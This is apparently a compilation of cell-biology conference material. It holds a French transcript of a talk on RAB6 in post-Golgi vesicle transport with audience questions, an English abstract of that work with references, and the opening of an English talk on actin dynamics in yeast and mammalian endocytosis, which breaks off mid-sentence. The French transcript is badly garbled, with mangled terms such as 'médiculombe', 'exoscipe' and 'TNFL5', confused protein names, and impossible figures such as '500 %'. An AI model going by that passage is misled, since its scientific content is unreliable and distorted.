voir que le protein dévient l'EA, atteint le Golgi, et ensuite, le Golgi et ensuite atteint le plasma membrane. Donc, c'est un très bon moyen de synchroniser le transport entre l'EA et le plasma membrane. Et je peux vous montrer aussi avec collage N10. Donc, c'est le même. Donc, le début de l'expérience, collage N10 est dans l'EA. Et vous ajoutez la bietin. Et ensuite, vous avez vu ce vasicule. Il est en train de collage N10 dans le protein solide. Donc, il est relis dans le milieu. Ok, donc, en faisant ça, on regarde attention à l'accent où, en fait, l'exercice de ce plasma membrane est illustré avec collage N10. Donc, c'est le film. Je vous le montrerai. Donc, c'est un médiculombe en plasma. Donc, après 10 minutes, la majorité du protein est dans le Golgi. Et ensuite, il est acheté le plasma membrane et le extrême cellulaire. Et en fait, je vous le jure le film. Et puis, à la fin de l'expérience, vous voyez parce que probablement collage N10 a diffusé de la cellulaire et est allé dans le médiculombe extrême cellulaire. Donc, en fait, ce que nous avons fait c'est de couper un assiette. En fait, les cellules sont grosses en couvertis, mais vous coupez le couvertis avec un antibody contre le GFP. Donc, quand il est relis dans le médiculombe, après l'exoscipe de ceci, donc, si, je veux dire, tout ce cargo a un GFP sur le GFP, et puis, parce que le couvertis est couvertis avec un GFP, le protein qui est secrète est en fait trompé à ce site où l'exoscipe de ceci a été accueillie. Donc, si vous faites ça, vous voyez, donc, encore une fois, le même experiment, donc, accepte, pardon, c'est fait sur couvertis, couvertis, donc, encore, donc, maintenant, ce que nous pouvons voir, c'est que je vous montre, encore, le film, c'est le GFP, le médiculombe, et puis, à la fin de l'expérience, vous voyez que, en fait, l'exoscipe de ceci n'a pas d'occurrencement à l'exoscipe de ceci, mais en fait, ce que nous pouvons aussi dire, l'exoscipe de ceci, et en fait, si vous regardez au coeur, donc, les pictures ne sont pas grises, donc, elles sont meilleures sur mon computer, mais donc, si vous gardez la saison avec le paxilim, qui est un marqueur de la edition focale, qui est au-delà de la saison à l'air, vous pouvez voir que tous ces les cargots, et en fait, les exoscipes, donc, les placements, les membranes, très proches de ce site focale, focale, de l'adhésion. Maintenant, si vous regardez, ok, donc, ceci est un sleut de complication, donc, je vais aller. Alors, comme vous le savez, peut-être que je ne le dis pas, donc, les trafics post-golvet sont dépendants de les micro-tubules, tous ces vésicles sont en train de bouger les placements, et puis, si vous faites cet expérience, vous pouvez, en fait, traquer tous ces vésicles avec ces différents marqueurs, et ce que nous pouvons, nous avons dit, si vous faites cet expérience, vous pouvez définir les trafics avec ces vésicles qui vivent dans le Golgi, les les placements, les marbles, les adhésions focales que vous avez utilisées, donc, ils utilisent les trafics micro-tubules, qui sont présentes ici, mais en fait, ils ont toujours toujours la même micro-tubule, donc, il y a beaucoup de micro-tubules, ils peuvent être utilisés plusieurs fois pour transporter cette carrière. Ok, donc, pour continuer, donc, ce que nous avons fait, c'est de voir ce que pourrait être la machine qui est présente près de l'adhésion focale dans le Sattel. En fait, ça a été élevé 10 ans auparavant par le groupe de Anacmanova maintenant dans le Utrecht. Ce qui est connu dans le FI, c'est la micro-tubule, c'est la adhésion focale, et en fait, près de la adhésion focale, vous avez un lien entre les micro-tubules et le site focale. Et en fait, un des joueurs de cette formation de cet site, c'est un proténe appelé ELKS ou aussi CAST, c'est le proténe actif en neurone. Et cet objectif, en fait, permet d'améliorer les micro-tubules près de l'adhésion focale et ça ne se démarre en fait, ELKS est un effecteur de la compréhension de la compréhension focale. Et si vous... cette expérience vous... c'est la situation contrôlée. Vous pouvez voir, c'est le GFP ELKS. Maintenant, si vous remouvez le GFP ELKS, il est localisé sur le plate-maman, mais il est aussi concentré en adhésion focale que suggestionnée par le modèle. Mais si vous remouvez l'ELKS, de l'ELKS par le SCRNA, vous pouvez voir que, en fait, vous perdez ce targouement préféré d'exhaustique pour le plate-maman. Parce que ça quantifie dans cette expérience. Donc, vous avez un site préféré d'exhaustique. Vous avez l'ELKS, qui semble être involvement dans ce processus. Donc, nous regardons plus attention à ce qui serait le rôle de l'ELKS dans ce processus. Donc, ce que nous avons fait c'est tous ces 3 cargos que nous avons parlé et ensuite, pour quantifier le nombre de basicules, que carré, TNF, Alpha, Collagen 10, qui sont aussi positifs pour le RAP6. Et donc, nous regardons un autre step, un à la fin de l'exhaustique durant l'exhaustique de ce basicule et donc, c'est mon troisième expérience. Et si vous quantifiez, vous voyez que je veux dire, à plus de 70 ou 80 % par exemple, les basicules qui contiennent CD59 sont aussi positifs pour le RAP6. Donc, c'est le même pour Collagen 10 ou Solimal et TNF Alpha. Maintenant, si vous regardez la exigence de Golgi, c'est le premier step, vous regardez, c'est le Golgi et, encore, vous quantifiez les basicules qui sont formés du RAP6 et les hominides contiennent un RAP6. Et comme vous pouvez le voir, aussi la majorité de ces basicules font contacter un RAP6. Et c'est le même dans le basicule, dans la route, sur le plus grand basicule, les basicules sont positifs. Donc, en fait, c'était un peu sur le basicule. Nous ne sommes pas attendus à ce résultat. Ce RAP6 sera présent sur beaucoup de basicules. Thomas. Si vous vous indiquiez les myocides et les tubes, et vous vous traitez maintenant les collagen, les gars, et les tubes contiennent les tubes. Oui, pour cela. Nous avons fait un expériment avec le cargo, pour les collagen. Et nous avons vu les tubes, et ces tubes contiennent le cargo. Mais le collagen que nous avons entendu, c'est de faire ce long de filaments, c'est ce que je dis? Ce collagen, la question est, c'est quoi, votre question? Le collagen est pollinérisé dans les 5 bords, donc, nous l'avons entendu dans le V-Vex Talk qu'il y avait ce large cargo. Je suis curieux, si vous vous arrêtez la fission, et vous avez ces longs tubes, et cette machine, vous vous voyez maintenant les bords de collagen, ou est-ce que vous continuez? Je pense que nous ne l'avons pas, vous devez l'attendre, donc, ce que nous avons vu, vous voyez les collagens dans ces tubes, il semble être discontinu, je l'avons dit, mais, d'honneur, je ne paye pas attention à l'organisation des collagens dans ces tubes, mais peut-être... Vous ne pensez pas que ce large, une question similaire, est-ce que les collagens, elles se sont plus élevées que les autres? Oui, donc... Oui, donc, c'est une collagen, je pense que le V-Vex a utilisé une collagen 7, non? Je ne sais pas. Il y a des collagens, il y a seulement 3 collagens qui font ce long, mais c'est le numéro 1, 2 et 3. Les autres collagens ont des molécules mais ils ont des rangs, donc, ils peuvent les formuler. On ne s'attend pas. On ne s'attend pas. Il y a des collagens, mais... Oui, c'est une question... Quand vous faites ces 3 films, que vous nous montrez, il s'agit pour moi que le collagen a été un... un excès synchronisé de la Golgi, qui est la dernière, mais qui a été un accès de l'amélioration. C'est difficile de dire, donc je ne sais pas exactement. C'est... C'est très chiant, il est con, il est con. Mais si vous regardez le CD59, c'est à moi, c'est assez plus solide. Oui, peut-être, pour cela. Il est analysé maintenant en détails, ce type de films, exactement, les kinétiques. Les vestiges sont plus grands, maintenant. Oui, bien sûr. Non, c'est... Vous avez l'air... C'est le brin, c'est-à-dire... Le brin, oui. Vous n'avez pas de résolution. Et la TNFL5, c'est un peu différent. Non, ils sont aussi grands. Ils sont aussi grands. C'est difficile de dire. C'est comme si vous étiez en feu. Ok, donc je vous montre ce slide. Et puis, bien sûr, c'était important de montrer que... C'est ce que vous avez fait avec le VSVG, c'est ce que vous utilisez comme un pétamac, c'est de regarder l'effect de... Quand vous retirez la TNFL5, quel est l'effect de la séquestion, je vais juste utiliser l'expérience faite avec la TNFL5. Donc, c'est le contrôle, et c'est après la déplique de la TNFL5 et que vous quantifiez l'amount de la TNFL5 à la membrane plasma après la séquestion. Et vous voyez que, après 30 ou 60 minutes, vous devez la séquestion de 50% de la TNFL5. En fait, la séquestion ne bloque pas la séquestion de la séquestion de la séquestion, mais juste délaie la séquestion. Et aussi, ce que vous pouvez voir, ce que vous pouvez voir, ce que vous pouvez voir, avec la mousse ambriolaine de Faberblass, je vous ai parlé de la mécanique de la TNFL5. Et puis, en ce cas, vous utilisez la séquestion de la totale de la TNFL5. Vous lavez juste le même, et puis vous regardez le maximum de la séquestion. Et comme vous pouvez le voir, après 1 heure, vous voyez que plus que 50% de la totale protein dans le milieu a été inhibite. Donc, c'est encore un argument pour dire que la TNFL5 est involveée en transport de nombreux types de protéines. Et la dernière expérience que je veux vous montrer, c'était... la question était si la séquestion pourrait être involveée en sorties. Comme vous le savez, l'une des fonctions de la TNFL5, c'est de sortir les protéines. Donc, les protéines sont allées à différentes destinations, de l'Ottawa, de l'Ottawa, et, je veux dire, les protéines, qui sont allées à différentes locations, sont sorties dans différentes populations de la physique. Donc, ce que nous avons fait pour savoir si le RAPSI était involveé en sorties est d'utiliser... d'expresser 2 ou 3 cargots dans le sang, et de voir les visuels qui contiennent 1 cargo ou 2 cargo. Et ce qui était le personnage de ces visuels qui étaient positifs pour le RAPSI. Je vous le montre, je pense que c'est avec la TNFL5. Donc, si vous regardez le yellow, donc, en fait, je ne peux pas le lire, mais je pense que c'est TNFL5 et... C'est TNFL5 et CD59, donc ce n'est pas important, parce que c'est toujours le même. Donc, on va dire que c'est TNFL5 et CD59. Donc, vous voyez que à bout de 50 % de visuels contiennent les 2 cargots. Et puis, vous avez à bout de 20 % de visuels qui contiennent seulement 1 cargo. Donc, en fait, le personnage de visuels qui contiennent 2 cargos est très haut, c'est à bout de 500 %. Mais ça peut être dur. Donc, on a parlé yesterday de ce massif. Donc, probablement, il y a un sortage entre les 2 cargots, mais parce que vous inquiétez il y a un grand flow de membrane. À un point, probablement, vous overcomptez le sortage de la machine. Mais encore, vous avez 20 % de visuels qui contiennent 1 cargo et 20 % d'autres cargos, qui signifie que c'est un sortage de visuels qui contiennent 2 cargos, mais il y a aussi de visuels qui contiennent 1 cargo. Donc, vous avez à bout de 60 % de visuels qui contiennent 2 cargos qui sont positifs pour le rap-sick. Mais c'est le même personnage de visuels qui contiennent 1 cargo. Donc, c'est un argument de dire que, en fait, rap-sick n'est pas invité dans le sortage de ces visuels. Donc, les visuels sont formés, mais ils associent avec les visuels. Ok, et c'est notre modèles. C'est le même scheme que précédemment. Donc, maintenant, c'est le micro-tubule. Donc, c'est l'adhésion de l'exhaustique, le sport, l'adhésion de la focale. Et donc, ce que nous proposons c'est que, en fait, ce post-gold G-trafficking est contrôlé par une machine co-machinerie qui est faite par le rap-sick, le rap-sick effecteur et le micro-tubule. Donc, encore une fois, c'est seulement non polarisé, donc on ne sait pas exactement ce qui est passé dans le polarisé. Donc, il y a plusieurs hypothèses. Donc, une qui est relativement simple, que ce domaine d'exhaustique, je dirais simplement, reflète la structure globale de la cellule, qui est dictée par l'organisation de l'actin et le micro-tubule de la nette-warp, ou peut-être cela aussi par rapport aux liens fonctionnaires et nous savons qu'ils existent entre le G-membre et la focale et ce lien qui est important pour la cellule, la polarisation et la migration. Ok, donc, je pense que il est parti. Est-ce que je peux plus de 5 minutes pour vous montrer? Je vais vous montrer. Comme je vous ai dit au début, on essaie de étudier la fonction des rapsiques dans le contexte de l'organisme. Et pour faire ça, nous avons créé un conditionnel rapsique nocardomais, c'est un classique qui s'appelle Quilox et en fait, rapsique est un gène essentiel et est requisé pour l'ambryogenesis et en fait, le maïs qui est presque le bon pour rapsique et le Nul et la LL, en fait, ils mourissent un jour à 5,5 et en fait, le type finut est exactement que vous avez trouvé quand vous avez joué à la intégrité de beta 1. Si vous regardez le texte, c'est une situation contrainte. Donc, à jour 5,5, vous avez la formation de ce membrane basé entre le bissard le déterre et le bissard. Mais si rapsique n'est pas présent, vous voyez que ce membrane basé ne peut pas être formé proprement. Et c'est connu que beta 1 intégrer et beta 1 intégrer le signage est le but pour la formation de ce membrane basé. Et en fait, une possibilité pour expliquer ce type finutif c'est un travail qui a été fabriqué en collaboration avec Ludger Grüneth. En fait, ce que nous avons fait est que nous avons discuté l'integrément de la récycling. Il y a un pass-à-pass qui utilise ce récycling d'un poulon inactif de l'integrément, de l'envers de la compréhension de la compréhension de la compréhension de la compréhension et de ce pass-à-pass pour récycler l'integrément inactif utilise de la rap 6 et de la machine pour ce pass-à-pass donc c'est peut-être pourquoi nous avons cet effectu durant notre éducation. Ok, alors, ce que nous avons fait est de couper cette maille avec beaucoup de mailles pour couper la rap 6 dans un certain dénouvel. Je vais vous montrer deux exemples qui ont été publiés. Pour étudier le rôle de rap 6 dans la mélenogenésie nous couperons cette maille donc elle est en train de travailler avec la institution et si vous regardez cette maille, donc cette maille ne peut pas expérimer rap 6 dans la mélenogenésie et vous voyez que cette maille a un effectu pigmentaire. Donc, maintenant, si vous regardez à la mélenosome et la mélenoside et la pigmentaire ne vont pas dans le détail mais si vous l'avez donc c'est la mélenoside normale donc elle est parmi la rap 6. Donc, c'est le contrôle, donc c'est la mélenoside et si vous dans cette rap 6 vous voyez que vous avez beaucoup moins de mélenine dans ces mélenosomes et donc c'est un travail publié donc je vais tout d'abord mais si vous regardez attention, vous voyez donc, c'est la mélenosome je vous le montre encore et vous voyez rap 6, la mélenosome est la moeve de cette mélenosome. Donc, l'interprétation de ces données est la suivante. Donc, en fait, dans cette saison rap 6 définit les passways qui connectent directement la Golgi à la 3e ou la maturisation de mélenosome. Et cette passway est importante pour ces mélenosomes. Donc, en fait, en ce cas et je pense que c'est assez intéressant donc le passway de la secrétaire que je vous ai dit il y a encore un moment mais dans cette saison, donc dans cette spécialisation en fait, partie de la passway de la secrétaire semble être divertie à cette mélenosome et cette passway utilise la même machinerie, donc je n'ai pas de temps mais aussi cette protein EIKS est important pour le targettage de cette vasique pour les mélenosomes. Donc, je ne peux pas vous vous montrer toutes les données mais je ne le remercie pas parce que c'est important pour mon dernier message. Donc, c'est un papier que j'ai juste récentement publié dans la journal of experimental medicine donc, maintenant c'est sur T-cell signalling donc, encore une fois, c'est une collaboration avec Clarivros aussi à l'Institut Curie donc maintenant, nous avons créé WAP6 FoxMice avec CD3Mice donc, en ce cas vous vous interviendrez WAP6 dans la T-Line donc, juste une introduction brief donc, nous parlons maintenant de la T-cell receptor et de T-cell signalling donc, vous savez, il y a beaucoup de proteins et il y a un protein qui s'appelle LAT qui est en fait partie de la complexe de T-cell receptor et cette protein, en fait, LAT donc, c'est-à-dire un cycle entre le membrane plasma et le poivre vesicula et donc, si vous... si vous regardez... je veux dire, ce qui se passe dans WAP6, knockout Nice donc, encore une fois, ne vous interviendrez pas en détail, mais en fait vous décrivez l'obligation de cette cellule d'infosite pour formuler et aussi, vous avez une forte inhibition de la activation T-cell de la activation T-cell et l'interprétation de cet résultat je vous montre briefly dans ce cas donc, encore une fois, vous avez WAP6 mais maintenant, WAP6 ne semble pas être directement involved dans le transport antérulat de LAT ou d'autres proteins qui sont dans le membrane mais le phenotype peut être expliqué mais un effectuant le rôle de WAP6 dans le transport retoré donc, vous dépliquez WAP6 et vous inhibiez le transport retoré et c'est pourquoi vous avez cet effectuant sur la cellule T-cell donc ok, je vais donc, et c'est ma conclusion comme je vous montre, WAP6 semble être une protein essentielle qui contrôle beaucoup de transports mais encore une fois, WAP6 semble être involvement en un transport spécifique dépendant en fait sur la cellule et la cellule et donc, la question que nous avons maintenant est pourquoi je veux dire ce que nous pensons que le effectuant de la plasticité d'intercellular de l'intercellular est un jeu d'effectus donc, c'est oui, donc je pense donc, on essaie de comprendre dans toute la cellule et la cellule ce que pourrait être la fonction de WAP6 et finalement les gens qui ont fait le travail donc, la plupart de la loi que je disais aujourd'hui ont été faites par mes assistants Stéphanie Miserillanquet étudiant de PhD un très bon ingénieur et le former postdoc Carina et la main collaboration de Franck Perez, Anoudus Ludger UNS Cédric et Grassa Raposo Clérive Rose et Marina Glucova donc, elles sont toutes les collaboraissances locales à la city careille, merci Applaudissements Sorry, j'ai mis tout le temps Le jour est vraiment confiant mais c'est un très confusé en photo parce que c'est comme il est involvement dans tout et donc, vous voyez plus comme un régulier général un pétrole d'information et de transport et d'intugie, pour les collaboraissances en regardant ou ce que la destination est parce que vous avez vu les rafs 6 et vous avez impliqué les rafs 6 en sécrétion mais avant, en transport et aussi en collaboraissances pour les collaboraissances donc, c'est tout le temps parce que vous avez une autre spécificité de détermination rafs ou rafs ou quelque chose qui va ajouter spécificité pour ces vesicles et rafs c'est juste un facteur général ou, comme vous l'avez dit dans différents types de celles rafs 6 fait des très spécifiques choses et vous êtes juste mixant les sounds et tout le temps et tout le temps ça ressemble à tout mais dans chaque cellule il y a une spécifique chose c'est une question très bonne c'est pourquoi nous essayons de faire ce travail dans les mailles non, je pense que rafs 6 une des fonctions principales rafs 6 qui ne pourrait être relative à l'export de RETOGA donc, en passant en passant en passant rafs 6 est un major protein qui est involved dans le target de ces vesicles donc, à l'alimentation de la micro-tibule ils sont targetés pour ces... le rôle de rafs 6 est de targeter, donc vous avez rafs 6 vous avez cette protein LKS ou cast et ce target c'est le basical probablement tout le genre de basical qui va au plat de la membrane pour cet exercice ok, donc la fonction de rafs 6 dans le transport de RETOGA peut-être pas disconnecté donc, cela a été élevé par... peut-être pas directement, mais... rafs 6, en state de state c'est la membrane de la membrane de la GOLD et vous avez ces vesicles qui viennent de l'endosone et maintenant rafs 6 peut être involved dans le complexe de VPS un complexe garp qui peut être dans le désir de vesicles qui viennent de l'endosone avec la membrane GOLD donc les deux situations peut-être que la même protein peut faire la même table à la même temps, pour ces... mais qu'est-ce que vous parlez de rafs 8 et qu'est-ce que vous faites? différents vesicles rafs 8, c'est... ce que l'Akmanova a dit c'est qu'en fait il y a un casquette entre rafs 6 et rafs 8 donc vous avez... je veux dire donc Anna est en pensant que les vesicles qui bougent de la GOLD sont les deux rafs 6 et rafs 8 donc rafs 6 sera intervérée dans le plan de la membrane et rafs 8 sera plus intervérée dans le process de fusion mais ce n'est pas complètement... ok, peut-être une dernière question ou bien on va voir, une question très courte et... ok donc ma question est, il y a vraiment il y a un lien avec les micro-tribules mais ce que vous avez dit est remarquable c'est que vous avez des micro-tribules spécifiques donc comment pensez-vous que ces spécifiques sont achetés et en fait, pensez-vous que ces micro-tribules sont nuclééles et c'est pourquoi ils répétitivement font le même transport et comment vous faites sure que les vesicles sont à la droite des micro-tribules? c'est une bonne question oui, nous pensons que les micro-tribules sont nucléés je veux dire, c'est... maintenant nous faisons un experiment et nous faisons un test pour les 50 nocars celles qui ne peuvent pas former les micro-tribules des membranes de la Golgi et ce sera une façon de répondre à votre question mais en fait, en termes de termes, vous pensez que Rapsix est directant la spécificité pour les spécifiques micro-tribules? non, je pense que si Rapsix est directement dans le... pour nucléer les spécifiques micro-tribules non, pour faire surement que les vesicles sont à la droite parce que, évidemment, tous les micro-tribules sont à la droite de la même chose oui, je pense que c'est une bonne question mais nous ne le savons pas je pense que c'est une bonne question mais nous ne le savons pas
|
The members of the RAB GTPase family (less than 60 proteins in man) are master regulators of intracellular transport and membrane trafficking in eukaryotic cells.RAB6 is one of the five ancestral RAB genes conserved from yeast to human. The RAB6 family comprises four proteins, named RAB6A, RAB6A’, RAB6B and RAB6C. The two ubiquitously expressed isoforms, RAB6A and A, are generated by alternative splicing of the same gene and localize to the Golgi complex. We and others have established that RAB6 regulates several transport pathways at the level of this organelle. Our recent work has focused on several aspects of RAB6 function: -The mechanisms involved in the fission of RAB6-positive transport carriers from Golgi/TGN (Trans-Golgi Network) membranes. We have previously shown that RAB6-Myosin IIA interaction is critical for this process [1]. Recently, we showed that the kinesin protein KIF20A is also involved in the fission process and serves to anchor RAB6 on Golgi/TGN membranes near microtubule (MT) nucleating sites. Our results suggest that the coupling between actin and MT cytoskeletons driven by Myosin II and KIF20A ensures the spatial coordination between the fission of RAB6-positive vesicles from Golgi/TGN membranes and their exit along microtubules [2]. - The role of RAB6 in post-Golgi transport. Using the RUSH system [3] and a variety of secretory cargos, including GPI-anchored proteins, TNF-alpha and Collagen-X, we found that RAB6 associates with post-Golgi vesicles containing all of these cargos. Depletion of RAB6 inhibits their arrival at the plasma membrane. These results suggest that RAB6 could be a general regulator of post-Golgi vesicles, possibly targeting secretory vesicles to defined exocytic sites on the cell surface [4]. -The role of RAB6 in cell lineages and tissues. We have generated mice with a conditional null allele of RAB6A [5]. The mice, which do not express RAB6A and RAB6A’, die at an early stage of embryonic development (day 5.5), indicating that RAB6A is an essential gene. The phenotype of RAB6A-/- embryos is very similar tothat of beta-1 integrin null embryos. This result is consistent with the finding that a pool of inactive integrins follows the retrograde pathway regulated by RAB6 and that this pathway is critical for adhesion and persistent cell migration [6]. The RAB6 k/o mice were crossed with several mouse lines to deplete RAB6 in various tissues or cell lineages. We will present data illustrating that RAB6 fulfills different functions depending on the cell or tissue context. References 1. Miserey-Lenkei et al. Nat. Cell Biol. 12, 645 (2010). 2. Miserey-Lenkei et al. Nat Commun. 8, 1254 (2017). 3. Boncompain et al. Nat. Methods 9, 493 (2012). 4. Miserey-Lenkei et al. submitted for publication. 5. Bardin et al. Biol. Cell 107, 427 (2015). 6. Shafaq-Zadah, Gomes-Santos, et al. Nat. Cell Biol. 18, 54 (2015).
|
10.5446/50885 (DOI)
|
Thank you very much. I'd like to thank the organizers, Mikhail, Annak, Nadia, and Nava for the opportunity to be here at this very, very interesting, enjoyable conference. Today I will tell you about our studies on the role of actin dynamics in endocytic trafficking. And we haven't heard enough about the cytoskeleton here yet. So I thought I'd start off with a picture of the actin cytoskeleton, which is one of the main subjects of study in my lab. This is a scheme made by Dyke Mullins and Tom Pollard, which shows the force generating machine that's responsible for the motility of cells and for other types of mechanical force generation in cells that use the actin cytoskeleton. So here the plasma membrane is depicted up here. The outside of the cell is up here, and this is the inside of the cell. And what happens is there's sort of a short signaling cascade that activates a protein complex called the ARP-2-3 complex depicted here in green, which then binds to the side of a preexisting actin filament and then makes a branch on that actin filament and actin monomers polymerize, and through a Brownian ratchet motion, this actin actually polymerizes at this so-called barbed end of the actin filament or plus end and pushes, can generate a pushing force on the plasma membrane. And this whole process, it involves a cycle of assembly and disassembly, and it's very interesting because actin assembles as an ATP bound protein, but then a short time after assembly a couple of things happen, a protein called capping protein caps the filaments. So filaments only grow for a couple of seconds before they're capped, and that's very important because the filaments must remain short if they're going to be able to resist the tension of the plasma membrane as they push on it. And then also as the, a short time after the actin assembles in these filaments, the ATP gets hydrolyzed to ADP, and that actually makes the filament susceptible to severing by a protein called cofillin, and cofillin severs the filaments, and then other proteins regenerate a pool of monomers which get recharged with ATP, and then the cycle continues, and so you get this constant assembly and pushing against the plasma membrane by this actin network. And this has been worked out in great detail where we know rate constants, concentrations, binding constants for all of the key factors involved in this process. This is through many labs, largely Tom Pollard's lab as well as Mary France Carlier's just down the road in Jif. And so for our work, this has been a really important framework for our studies because what attracted us to endocytosis, because we're really a cytoskeleton lab and many of the projects in our lab actually have nothing to do with, membranes just have to do with actin assembly, is that it turned out in budding yeast where we began most of our studies, including endocytosis, the assembly of actin here shown in red is absolutely essential to invaginate the membrane and to pull off endocytic vesicles for the vesicles to undergo scission. And so we study this system as a way to study in a biological context how the forces generated by the assembling actin are harnessed to do work for biological processes and it's proved to be a very nice model and I should say my lab is sort of split half in yeast and half in mammalian cells. So how did we get involved in all this? Well we were working in budding yeast some time ago and we started identifying proteins that regulate actin. The first one that I found as a postdoctoral fellow, I called ABP1 for actin binding protein 1, because it was the first actin binding protein found in yeast. Through genetics and biochemistry, we and others found many other proteins that interacted with ABP1 and with each other using a synthetic lethal screen of the type Charlie Boone mentioned. We found a gene called SLA1 for synthetic lethal with ABP1. What was curious and as we started to work out this network is that a number of proteins that sort of were entangled in this interaction network of physical and functional interactions were proteins that had been implicated in endocytosis. And at that time in the 1990s, those two processes weren't, there really wasn't any good reason to think that they were directly involved with each other. And that was something that we found curious. We kept running into genes, for example, called end genes that someone named Harold Reisman in Geneva was studying because he was studying endocytosis in yeast cells. But we didn't really know exactly what to make of it. So then this was around the time that after GFP had been found and different spectral variants of GFP had been found, it was possible to start doing live cell two color imaging. And I had a new postdoc in my lab named Marco Kexonen who was very interested in this problem of how these proteins were working with each other. And he decided to set to work by tagging pairwise combinations of proteins in this network with green fluorescent protein and red fluorescent protein and looking at them, looking at live cells expressing both proteins at the same time. So doing two color imaging. And so one of the, I think the first pair he looked at, he tagged ABP1 and SLA1. This SLA1 protein turns out to be interesting because it's an endocytic adapter. It binds directly to endocytic cargo to the pheromone receptor in budding yeast. And so this is what Marco saw. Now, first of all, so other people had started to look at these proteins and they did this by looking at static images of cells. And there was a paper published, for example, that looked at actin. Here the red is surrogate for actin and an endocytic protein here in green and concluded that for the most part they were present in different structures in a yeast cell. You know, occasionally you would see some yellow, which meant that the two proteins were together but it's hard to know when it's just a low level of coincidence what to make of that. But the real significance of this interaction and the explanation for how these proteins are functioning together in a network comes when you do two-color live cell imaging. And Marco did a couple things differently from what other people did. One is he looked at two colors in real time and another is he used a medial focal plane. So yeast cells are spherical. And if you use a medial focal plane, you're really focused on the surface of the cell just around the edges. And you can see that all of these dot structures, we call patches, are present on the surface of the cell. Okay? Now, if you watch in real time, you see something really interesting. And that is that every single patch has a very similar, undergoes a very similar dynamic process. When it first appears on the surface, it's green. And then invariably, that green patch turns yellow. In other words, it first, first an endosylic adapter appears on the surface of the cell and then actin filaments start to assemble at that site a short time later. It happens in a very predictable order. First the endosylic adapter and then the actin. And then if you really study, it's amazing, a simple movie like this. A question came up the other day in the discussion, you know, what can you learn from live cell imaging? And a simple movie like this, it's amazing what you can learn. One of the things, if you really study this movie, that you start to notice is that just when these patches start to turn yellow, they move off of the surface into the cytoplasm. Okay? As though perhaps the forces from actin polymerization are driving some sort of structure from the surface of the cell into the cytoplasm. You can depict that nicely, making something called a chimograph where you draw a line through one of these patches and sample that line in every frame of a movie. And then you can see that this endosylic protein here is present over time on the surface of the cell. Then there's this burst of actin polymerization at exactly that moment. The endosylic protein starts to curve off of the surface of the cell into the cell's interior. Okay? Showing there's a very tight correlation between the assembly of actin and the movement of this structure into the interior of the cell. So we've done this experiment over and over again with a lot of pairwise permutations. It turns out there's about 50 or 60 proteins that are in this network. And what we ended up with is this, which summarizes quite a few years of work from my lab and other labs in the field. And what it shows is a cartoon of what we think is happening on the surface of the cell. We think that some endosylic proteins start to accumulate, cargo starts to get captured, and then there's a burst of actin polymerization. The forces from that actin polymerization are harnessed to invaginate the membrane and pull off a vesicle. And then along that timeline and color-coded with the cartoon above are about 50 proteins that we have ordered in this pathway all by doing different pairwise permutations of labeled proteins. For example, that SLA1 protein that I told you is an endosylic adapter is here, and ABP1 is here that is showed you in the pair. And so SLA1 arrives, and then predictably ABP1 also arrives with actually a very predictable and minimally variable amount of time between the appearance of these proteins. So what we've done is built this temporal map for the recruitment of many different proteins to these sites of endocytosis. And when you do this for 50 proteins, it gives you kind of a holistic view of this very complex pathway and series of events. And so one thing you can do is, you know, it's really hard to think about the functions of 50 or 60 proteins, at least for me, is you start to see that you can cluster groups of proteins together within the pathway. For example, early proteins were things like COAT proteins, and you can do that by looking at genetic interactions, physical interactions, the dynamics of the proteins, the lifetimes of proteins, phenotypes when you knock out proteins. And you know, what we realized is that you could cluster these 50 proteins into maybe four or five groups of proteins. And then we developed the concept that these were modules of proteins, and each module was carrying out a function. And so the first module proteins shown in green and light blue are sort of a coat that, you know, would create the coat of the vesicle and also capture cargo. This blue module are proteins that would link the coat to machinery that nucleates act in assembly, then machinery that nucleates act in assembly, shown in purple here, and that generates forces on the actin, would get recruited. So a WASP protein that activates this R2-3 complex, a nucleate actin, a myosin that generates forces on actin. These proteins start to accumulate. Interestingly, there are a lot of multivalent proteins. There are SH3 and proline-rich proteins here. We think that there might be a phase transition involved in, and we published a paper last year on this in linking the actin assembly to this endocytic coat, because there seems to be a threshold effect where having these multivalent interactions concentrates the activators of the R2-3 complex, because then what happens is we reach a threshold effect of a couple of key proteins, and then there's this transient burst of actin assembly. And the reason that it was so hard for people to detect an association of actin with the endocytic machinery earlier is because this interaction is so transient. Okay, that transiently, there's a burst of actin assembly. Knowing when things get recruited in the pathway can generate ideas about what things might be doing, so the actin is recruited very late when the vesicle internalizes, suggesting it's generating a force. These bar proteins come really late in the pathway, suggesting they might be involved in scission, which was again verified by genetics. Now key to a lot of this work and our ability to make such a precise pathway was the fact that in yeast we could precisely integrate GFP and RFP into the genome because homologous recombination is very robust in yeast, and so we could look at the dynamics of each of these proteins expressed at their native levels, because we didn't have to do what was commonly done in mammalian cells, which is to make a CDNA of a gene you're interested in, clone GFP or RFP behind it and then reintroduce it into cells, in other words, and then over-express that protein on top of the endogenous proteins. What we decided to do, so we started, our eyes started looking towards mammalian cells because a number of proteins in that network that we found in budding yeast had homologs, almost all of them did, in mammalian cells, and a great number of them were unstudied, and so we decided, why don't we study them? And then when we decided to look at the dynamics in mammalian cells, we decided to use genome editing to make precise integrations. So for example, we tagged the clathrin coat with RFP and the dynamin protein that mediates the scission of the vesicle with GFP, but we did this using first zinc fingers, but nowadays CRISPR-Cas9 to make a precise integration of these tags. And so as Tommy showed you yesterday, you can now, you can look at these events in real time in mammalian cells, and many other labs have done this, including Tommy's before us, but I think one innovation we made was to do this at endogenous levels by genome editing. So here you could see the red clathrin coat appearing in this turf. This is an early turf movie of ours, and then each of these spots very predictably would turn sort of yellow and green when the dynamin would come to mediate the fission event. And so it's a fair amount of trouble to do the genome editing, and you can ask, is it worth that extra work? And so one way we looked at this question was to compare cells in which we had overexpressed clathrin and dynamin as RFP and GFP and another to cells where they were endogenously tagged. And so to do this, we made 3D climographs. So I showed you a 2D climograph before, but in this case, we took a four-minute movie like this and showed the entire movie in one picture by putting time in the z dimension. So these are basically a stack of frames from a movie, and you can see each endocytic site when we overexpressed clathrin and dynamin, and you can see that the two colors kind of blur together, and so it's really hard to distinguish if one protein is arriving much before the other, and that sort of thing when you overexpress the proteins. But when you genome edit the cells, you find that there's a nice period when the clathrin is assembling and you have primarily clathrin, and then the end of the process is punctuated when dynamin is recruited and vesicle scission occurs. So we think that having these genome-edded cells, and we now have probably, I don't know, 130, 140 lines in the lab with various proteins engineered, allows us more sensitivity to both look at the normal cells but also to look for effects of perturbations in the cells, but we also, coming from a yeast background, we wanted to try to more closely replicate some of the features of yeast cells, and oh, sorry, this shows you sort of a profile of looking at the average, you can look at the kinetics of clathrin 